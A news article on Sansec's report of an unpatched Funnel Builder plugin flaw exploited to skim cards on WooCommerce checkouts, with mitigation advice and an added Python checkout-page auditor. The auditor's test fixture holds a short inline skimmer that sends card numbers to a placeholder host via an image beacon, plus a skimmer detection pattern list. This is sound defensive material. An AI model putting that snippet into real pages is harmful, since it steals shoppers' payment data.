A critical security vulnerability in the Funnel Builder plugin for WordPress is now under active exploitation in the wild. Attackers are leveraging the flaw to inject malicious JavaScript code into WooCommerce checkout pages, aiming to steal payment data from customers.
The details of the ongoing activity were published by Sansec this week. According to the security firm, the vulnerability currently has no official CVE identifier. A CVE is only a tracking number, but without one the flaw does not appear in the vulnerability feeds and scanners many merchants rely on, so affected installs go unflagged and stay exposed for longer.
Nature of the Attack
The exploitation targets sites running the Funnel Builder plugin, a popular tool used to create optimized sales funnels for WooCommerce. By exploiting the unpatched flaw, attackers can inject code directly into the checkout flow, a technique commonly known as formjacking or digital skimming.
This malicious code is designed to capture sensitive payment information such as credit card numbers, expiry dates, and CVV codes as customers enter them. The stolen data is then exfiltrated to a remote server controlled by the attackers.
Scope and Impact
Sansec has not disclosed the total number of sites affected, but given the widespread use of the Funnel Builder plugin among WooCommerce merchants, the potential impact is significant. WooCommerce powers a substantial portion of all online stores, making it a high value target for skimming campaigns.
The exploitation appears to be highly targeted, but the firm warns that automated scanning for vulnerable sites is likely underway. Merchants using the plugin are urged to treat the situation as critical and take immediate defensive measures.
Response and Mitigation
As of this publication, no official patch or advisory has been issued by the plugin developer. The missing CVE ID does not itself block disclosure or a fix, but it does keep the flaw out of the vulnerability databases that coordinated remediation, automated advisories and dependency checks are built around, which may slow the response.
Site administrators are advised to temporarily disable the Funnel Builder plugin if possible. Where that is not an option, a Content Security Policy that restricts script-src, connect-src, img-src and form-action to known origins limits where injected code can load from and where it can send captured data; it should be set at the web server or CDN layer rather than from within WordPress, so that a compromised plugin cannot strip it. Web application firewalls may also help block known attack patterns, though they are not a guaranteed fix.
Sansec recommends that all WooCommerce merchants review their checkout pages for unauthorized scripts, audit recent file changes, and monitor server logs for suspicious requests. Additionally, any site that processes credit card data should verify PCI DSS compliance to ensure proper data handling safeguards are in place; PCI DSS v4.0 requirements 6.4.3 (an authorized inventory of payment-page scripts) and 11.6.1 (change and tamper detection on payment pages) address exactly this kind of skimming.
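The checkout-page review and the CSP recommendation above can be automated. The following is an added example, not code from Sansec, WooCommerce or the Funnel Builder project: it parses a saved copy of the checkout page, flags external scripts whose origin is not on a per-site allowlist and inline scripts that match generic skimmer traits, and derives a matching Content-Security-Policy value. ALLOWED_SCRIPT_ORIGINS, SKIMMER_MARKERS and SAMPLE_CHECKOUT are assumed placeholders and constructed test data, not indicators from the reported campaign.

```python
"""Offline audit of a WooCommerce checkout page for unauthorised scripts.

Added example, not code from Sansec, WooCommerce or the Funnel Builder project.
It assumes a per-site allowlist of script origins (ALLOWED_SCRIPT_ORIGINS,
placeholder values) and uses generic skimmer heuristics, not indicators from
the campaign described in the article. SAMPLE_CHECKOUT is constructed test data.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Origins this store legitimately loads scripts from (assumed placeholders).
ALLOWED_SCRIPT_ORIGINS = {"https://shop.example", "https://js.stripe.com"}

# Generic traits of card-skimming JavaScript: reads card fields, decodes or
# obfuscates strings, exfiltrates via image beacons or sendBeacon. Heuristics.
SKIMMER_MARKERS = [
    r"card[-_ ]?number", r"\bcvv\b", r"\bcvc\b", r"exp(iry|_month|_year)",
    r"\batob\(", r"fromCharCode", r"sendBeacon\(", r"new Image\(\)\.src",
]


class _ScriptCollector(HTMLParser):
    """Collect every <script> tag: its src attribute and its inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> contents as data chunks; join them.
        if self._in_script:
            self.scripts[-1]["body"] += data


def script_origin(src):
    """Origin of a script URL; relative paths count as the page's own origin."""
    u = urlsplit(src)
    if not u.netloc:
        return "self"
    return f"{u.scheme or 'https'}://{u.netloc}"


def audit_checkout_html(html, allowed_origins=ALLOWED_SCRIPT_ORIGINS):
    """Return findings for external scripts from non-allowlisted origins and
    for inline scripts matching skimmer heuristics. Empty list means clean."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    findings = []
    for s in p.scripts:
        if s["src"]:
            origin = script_origin(s["src"])
            if origin != "self" and origin not in allowed_origins:
                findings.append({"kind": "external", "origin": origin, "src": s["src"]})
        else:
            hits = [m for m in SKIMMER_MARKERS if re.search(m, s["body"], re.I)]
            if hits:
                findings.append({"kind": "inline", "markers": hits,
                                 "snippet": s["body"].strip()[:80]})
    return findings


def csp_header(allowed_origins=ALLOWED_SCRIPT_ORIGINS):
    """Content-Security-Policy value confining script loads and the usual
    exfiltration channels (fetch/XHR/beacon, image beacons, form posts)."""
    src = " ".join(sorted(allowed_origins))
    return (f"default-src 'self'; script-src 'self' {src}; "
            f"connect-src 'self' {src}; img-src 'self' data:; "
            f"form-action 'self' {src}; frame-ancestors 'none'")


# Constructed checkout page: two legitimate scripts, one same-origin plugin
# script, one rogue external loader and one inline skimmer (placeholder hosts).
SAMPLE_CHECKOUT = """<html><head>
<script src="https://shop.example/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="/wp-content/plugins/example-plugin/checkout.js"></script>
<script src="https://stats-cdn.example.net/loader.js"></script>
<script>
document.addEventListener('submit', function () {
  var n = document.querySelector('#card-number').value;
  new Image().src = 'https://stats-cdn.example.net/c?d=' + btoa(n);
});
</script>
</head><body><form id="checkout"></form></body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_html(SAMPLE_CHECKOUT):
        print(finding)
    print(csp_header())
```

Two caveats when applying this. A same-origin script (relative path) is not flagged, so a skimmer dropped into wp-content/uploads or appended to a plugin file passes the origin check; that is what the file-change audit is for (for plugins distributed through wordpress.org, wp-cli's `wp plugin verify-checksums --all` compares installed files against the published release). And WordPress and WooCommerce emit many inline scripts, so the generated policy will break the checkout unless those are given nonces or hashes; deploy it in Content-Security-Policy-Report-Only first and promote it once the report endpoint is quiet.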
Broader Context
The attack underscores a growing trend in e-commerce threats where vulnerabilities in third party plugins become gateways for payment skimming. Previous incidents involving WooCommerce have demonstrated how a single unpatched component can compromise thousands of online stores.
The absence of a CVE identifier also highlights structural gaps in how some plugin vulnerabilities are reported and tracked, leaving merchants without clear timelines for fixes.
Sites running outdated versions of the Funnel Builder plugin are considered at highest risk. Sansec has not specified which version numbers are vulnerable, so every currently installed version should be treated as vulnerable until the developer publishes a release that explicitly fixes the flaw.
Businesses using WooCommerce are encouraged to maintain a rigorous update schedule, limit the number of third party plugins, and conduct regular security audits of their digital storefronts.
Stolen payment data can be used for fraudulent transactions, sold on the dark web, or linked to identity theft schemes. Merchants may also face regulatory fines and reputational damage if customer data is compromised through their store.
The incident serves as a reminder that plugin ecosystems remain a weak point in e-commerce security, requiring constant vigilance from both developers and site operators.
Sansec has stated it will continue to monitor the situation and provide updates as more information becomes available. The firm expects that a formal CVE assignment and a patch from the plugin developer will follow, though no specific timeline has been provided.
Until an official fix is released, site owners must weigh business continuity needs against the risk of active exploitation and consider temporarily moving to a hosted or redirect-based payment flow, so that card details are never typed into the WooCommerce checkout page itself.